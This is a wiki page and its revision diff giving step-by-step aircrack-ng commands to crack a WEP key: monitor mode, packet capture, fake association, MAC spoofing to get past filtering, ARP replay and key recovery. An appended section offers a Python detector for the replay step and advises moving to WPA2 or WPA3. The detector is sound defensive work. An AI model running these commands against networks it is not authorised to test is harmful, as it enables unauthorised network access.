Difference between revisions of "Cracking A WEP Key"

From Nearline Storage
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 +
See http://www.aircrack-ng.org/doku.php?id=tutorial
 +
 
*Install kismet, kismet-plugins and aircrack-ng packages
 
*Install kismet, kismet-plugins and aircrack-ng packages
 
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
 
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
Line 25: Line 27:
 
*Ctrl-C the dump process and crack the key:
 
*Ctrl-C the dump process and crack the key:
 
   aircrack-ng dumpfile.ivs
 
   aircrack-ng dumpfile.ivs
 +
 +
[[Category:Networking]]

Latest revision as of 15:37, 31 December 2019

See http://www.aircrack-ng.org/doku.php?id=tutorial

  • Install kismet, kismet-plugins and aircrack-ng packages
  • Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked

These tools are fussy about hex addresses: include leading zeros and don't use lowercase hex digits.

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile --channel <channel> mon0


If you don't get enough traffic from the access point on that channel, start a new terminal session:

  • Associate with the target AP
 aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.

  • Start replaying packets so that we can collect more packets:
 aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session; we want more than 100,000 unique IV headers.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs
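
From the defender's side, the replay step (aireplay-ng -3) above is visible on the air: the replaying station resends one captured frame unchanged, so the same WEP IV and frame length repeat from one transmitter far more often than link-layer retries would explain. The detector below is an added example, not part of the original wiki page; the record format, window and threshold are assumptions, and the sample frames are constructed.

```python
from collections import Counter

# Constructed sample records: (time_ms, transmitter MAC, WEP IV hex, frame length).
# Assumption: a monitor-mode sensor feeds records shaped like this.
def build_sample():
    frames = []
    # Normal client: a fresh IV on every frame, varying lengths.
    for i in range(200):
        frames.append((i * 50, "00:11:22:33:44:55", f"{0x0A0000 + i:06X}", 120 + i % 40))
    # Replaying station: one captured frame re-sent unchanged, so the IV and
    # length never change (the sender cannot re-encrypt without the key).
    for i in range(500):
        frames.append((2000 + i * 2, "00:01:02:03:04:05", "3F9C01", 68))
    return sorted(frames)

def find_iv_replay(frames, window_ms=1000, threshold=50):
    """Flag transmitters that repeat one (IV, length) pair more than
    `threshold` times inside a single window_ms bucket.

    Returns {mac: (iv, length, peak_count)}. Window and threshold are
    assumed starting values; tune them against your own baseline.
    """
    counts = Counter()
    for t_ms, mac, iv, length in frames:
        counts[(t_ms // window_ms, mac.upper(), iv.upper(), length)] += 1
    alerts = {}
    for (_bucket, mac, iv, length), n in counts.items():
        if n > threshold and n > alerts.get(mac, (None, None, 0))[2]:
            alerts[mac] = (iv, length, n)
    return alerts

if __name__ == "__main__":
    for mac, (iv, length, n) in find_iv_replay(build_sample()).items():
        print(f"possible WEP replay: {mac} sent IV {iv} ({length} bytes) {n} times in 1 s")
```

An alert of this kind on a WEP network is a reason to move the access point to WPA2 or WPA3 rather than to tune the sensor.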